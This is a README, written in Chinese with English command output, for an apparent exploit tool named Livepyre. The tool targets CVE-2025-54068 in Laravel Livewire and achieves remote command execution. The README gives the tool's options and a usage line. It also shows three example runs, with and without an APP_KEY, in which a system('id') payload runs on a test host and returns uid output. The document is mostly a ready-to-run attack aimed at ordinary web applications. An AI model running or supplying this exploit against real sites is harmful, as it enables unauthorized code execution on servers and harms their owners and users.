# Livepyre
一款旨在利用 CVE-2025-54068 和远程命令执行的工具,前提是已知 Livewire 项目的 APP_KEY。
工具作者:`@_remsio_` `@_Worty`。
## 帮助
```
$ ./Livepyre.py -h
usage: Livepyre.py [-h] -u URL [-f FUNCTION] [-p PARAM] [-H HEADERS] [-P PROXY] [-a APP_KEY] [-d] [-F]
[-c]
Livewire exploit tool
options:
-h, --help show this help message and exit
-u, --url URL Target URL
-f, --function FUNCTION
Function to execute (default: system)
-p, --param PARAM Param for function (default: id)
-H, --headers HEADERS
Headers to add to the request (default None)
-P, --proxy PROXY Proxy URL for requests
-a, --app-key APP_KEY
APP_KEY to sign snapshot
-d, --debug Enable debug output
-F, --force Force exploit even if version does not seems to be vulnerable
-c, --check Only check if the remote target is vulnerable (only revelant for the exploit
without the APP_KEY)
```
## 用法
```
$ ./Livepyre.py -u https://target.com/
```
## 示例
```
# 如果没有 APP_KEY 并且 snapshot 中存在 object type
$ ./Livepyre.py -u http://livewire.local/counter
[INFO] The remote livewire version is v3.6.2, the target is vulnerable.
[INFO] Found snapshot(s). Running exploit.
[INFO] Running exploit without APP_KEY.
[INFO] Found 1 snapshot(s) available.
[INFO] Found 2 possible param(s).
[INFO] Checking for param(s) with object type to avoid bruteforce.
[INFO] test is typed as an object, triggering RCE.
[INFO] Sending payload system('id') to livewire.
[INFO] Payload works, output:
uid=1337(sail) gid=33(www-data) groups=33(www-data)
# 如果没有 APP_KEY 且 snapshot 中不存在任何 object type,则使用 bruteforce
$ ./Livepyre.py -u http://livewire.local/counter
[INFO] The remote livewire version is v3.6.2, the target is vulnerable.
[INFO] Found snapshot(s). Running exploit.
[INFO] Running exploit without APP_KEY.
[INFO] Found 1 snapshot(s) available.
[INFO] Found 1 possible param(s).
[INFO] Checking for param(s) with object type to avoid bruteforce.
[WARNING] No param with direct object type was found, attempting bruteforce.
[INFO] Trying to gain RCE with param count.
[INFO] Sending payload system('id') to livewire.
[INFO] Payload works, output:
uid=1337(sail) gid=33(www-data) groups=33(www-data)
# 带有 APP_KEY
$ ./Livepyre.py -u http://livewire.local/counter -a 'base64:CGhMqYXFMzbOe048WS6a0iG8f6bBcTLVbP36bqqrvuA='
[INFO] The remote livewire version is v3.6.2, the target is vulnerable.
[INFO] Found snapshot(s). Running exploit.
[INFO] Running exploit with APP_KEY.
[INFO] Found 1 snapshot(s) available.
[INFO] Sending payload system('id') to livewire.
[INFO] Payload works, output:
uid=1337(sail) gid=33(www-data) groups=33(www-data)
```
# 许可证
本项目基于 MIT 许可证授权 - 详见 LICENSE 文件。